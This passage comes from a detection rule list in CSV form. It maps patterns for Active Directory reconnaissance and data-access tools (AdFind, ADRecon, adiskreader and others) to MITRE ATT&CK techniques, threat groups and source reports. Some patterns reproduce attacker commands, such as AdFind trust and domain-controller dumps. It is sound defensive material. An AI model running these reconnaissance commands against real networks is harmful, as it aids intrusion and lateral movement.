- INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -sc trustdump*",".{0,1000}\s\-sc\strustdump.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe -gcb -sc trustdmp > *",".{0,1000}\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*.exe -sc adinfo > *",".{0,1000}\.exe\s\-sc\sadinfo\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. 
or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*.exe -sc dclist > *",".{0,1000}\.exe\s\-sc\sdclist\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*.exe -sc trustdmp > *",".{0,1000}\.exe\s\-sc\strustdmp\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. 
This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*.exe -subnets -f (objectCategory=subnet) > *",".{0,1000}\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*/AdFind.zip*",".{0,1000}\/AdFind\.zip.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\adf.bat*",".{0,1000}\\adf\.bat.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z" "*\adfind.cf*",".{0,1000}\\adfind\.cf.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AdFind.zip*",".{0,1000}\\AdFind\.zip.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AdFind<*",".{0,1000}\>AdFind\<.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A" "*484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384*",".{0,1000}484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind -f *",".{0,1000}adfind\s\-f\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind -f objectclass=trusteddomain*",".{0,1000}adfind\s\-f\sobjectclass\=trusteddomain.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind.bat*",".{0,1000}adfind\.bat.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*adfind.exe -f objectclass=trusteddomain*",".{0,1000}adfind\.exe\s\-f\sobjectclass\=trusteddomain.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind.exe -sc trustdmp*",".{0,1000}adfind\.exe\s\-sc\strustdmp.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*adfind.exe*",".{0,1000}adfind\.exe.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. 
privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*AdFind\AdFind.cpp*",".{0,1000}AdFind\\AdFind\.cpp.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AdFind_original.exe*",".{0,1000}AdFind_original\.exe.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*computers_pwdnotreqd*",".{0,1000}computers_pwdnotreqd.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*joeware_default_adfind.cf*",".{0,1000}joeware_default_adfind\.cf.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*name=*Domain Admins*",".{0,1000}name\=.{0,1000}Domain\sAdmins.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tools/adfind*",".{0,1000}tools\/adfind.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*/ADGet.exe*",".{0,1000}\\ADGet\.exe.{0,1000}","greyware_tool_keyword","adget","gather valuable information about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ADGet.exe*",".{0,1000}\\ADGet\.exe.{0,1000}","greyware_tool_keyword","adget","gather valuable information about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*hhdobjgopfphlmjbmnpglhfcgppchgje*",".{0,1000}hhdobjgopfphlmjbmnpglhfcgppchgje.{0,1000}","greyware_tool_keyword","AdGuard VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*# adiskreader *",".{0,1000}\#\sadiskreader\s.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and 
remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","0","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z" "*\adiskreader\*",".{0,1000}\\adiskreader\\.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","0","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z" "*adiskreader.disks.raw*",".{0,1000}adiskreader\.disks\.raw.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","1","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z" "*adiskreader.disks.vhdx*",".{0,1000}adiskreader\.disks\.vhdx.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","1","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z" "* ADRecon.ps1*",".{0,1000}\sADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" 
"*$base64adrecon*",".{0,1000}\$base64adrecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","#variable","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*/ADRecon.git*",".{0,1000}\/ADRecon\.git.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*/ADRecon.ps1*",".{0,1000}\/ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*[-] Kerberoast*",".{0,1000}\[\-\]\sKerberoast.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered 
Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*[Get-ADRRevertToSelf] Token impersonation successfully reverted*",".{0,1000}\[Get\-ADRRevertToSelf\]\sToken\simpersonation\ssuccessfully\sreverted.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*[Get-ADR-UserImpersonation] Alternate credentials successfully impersonated*",".{0,1000}\[Get\-ADR\-UserImpersonation\]\sAlternate\scredentials\ssuccessfully\simpersonated.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*\ADRecon.ps1*",".{0,1000}\\ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" 
"*\ADRecon-master*",".{0,1000}\\ADRecon\-master.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*\ADRecon-Report.xlsx*",".{0,1000}\\ADRecon\-Report\.xlsx.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*\BitLockerRecoveryKeys.csv*",".{0,1000}\\BitLockerRecoveryKeys\.csv.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*\DefaultPasswordPolicy.csv*",".{0,1000}\\DefaultPasswordPolicy\.csv.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - 
